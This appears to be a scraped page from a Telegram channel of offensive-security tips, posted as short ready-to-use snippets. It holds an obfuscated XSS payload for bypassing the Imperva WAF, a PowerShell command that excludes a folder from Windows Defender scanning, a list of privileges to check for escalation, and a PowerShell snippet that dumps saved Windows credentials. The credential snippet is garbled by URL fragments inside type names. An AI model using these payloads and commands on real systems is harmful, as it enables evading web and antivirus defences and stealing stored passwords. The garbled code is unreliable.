Information Security
408 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
TIDoS Framework

The Offensive Web Application Penetration Testing Framework.


https://github.com/theInfectedDrake/TIDoS-Framework


#web
#pentest
Imperva WAF Bypass for XSS;

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

- without parentheses, 'alert', 'document.domain' , 'window' , space




#waf
#web
#pentest



@sec_nerd
Add a file/folder to #Windows Defender exclusion list

C:\>powershell -exec bypass - "Add-MpPreference -ExclusionPath 'D:\EvilFolder\Tools'"

useful if you want to move #pentest tools to a Windows machine without Defender interfering

Admin UAC prompt required

#powershell #oscp
Best #firefox addons for #Hacking:
-HackBar
-Cookies Manager+
-User-Agent Switcher
-Tamper Data
-FoxyProxy Standard
-Wappalyzer:
-HttpRequester
-RESTClient:
-Tampermonkey
-XSS Me
-SQL Inject Me
-iMacros
-FirePHP
#bugbountytips #bugbountytip #hacking #OSINT #pentest
No Privilege Escalating through standard methods ?

whoami /priv

If you got one of these == win 😏


SeBackupPrivilege, SeDebugPrivilege, SeTakeOwnershipPrivilege, SeTcbPrivilege, SeCreateToken Privilege, SeLoadDriver Privilege, SeImpersonate

#infosec #pentest #redteam
Dump local Creds

PS>
[void][http://Windows.Security.Credentials.PasswordVault,http://Windows.Security.Credentials,ContentType=WindowsRuntime]
$pw = New-Object http://Windows.Security.Credentials.PasswordVault
$pw.RetrieveAll() | % { $_.RetrievePassword();$_ }

#redteam #pentest
Grep hostnames from ssl certificate

echo | openssl s_client -connect example\.com | openssl x509 -noout -text | grep DNS

#infosec #pentest #bugbounty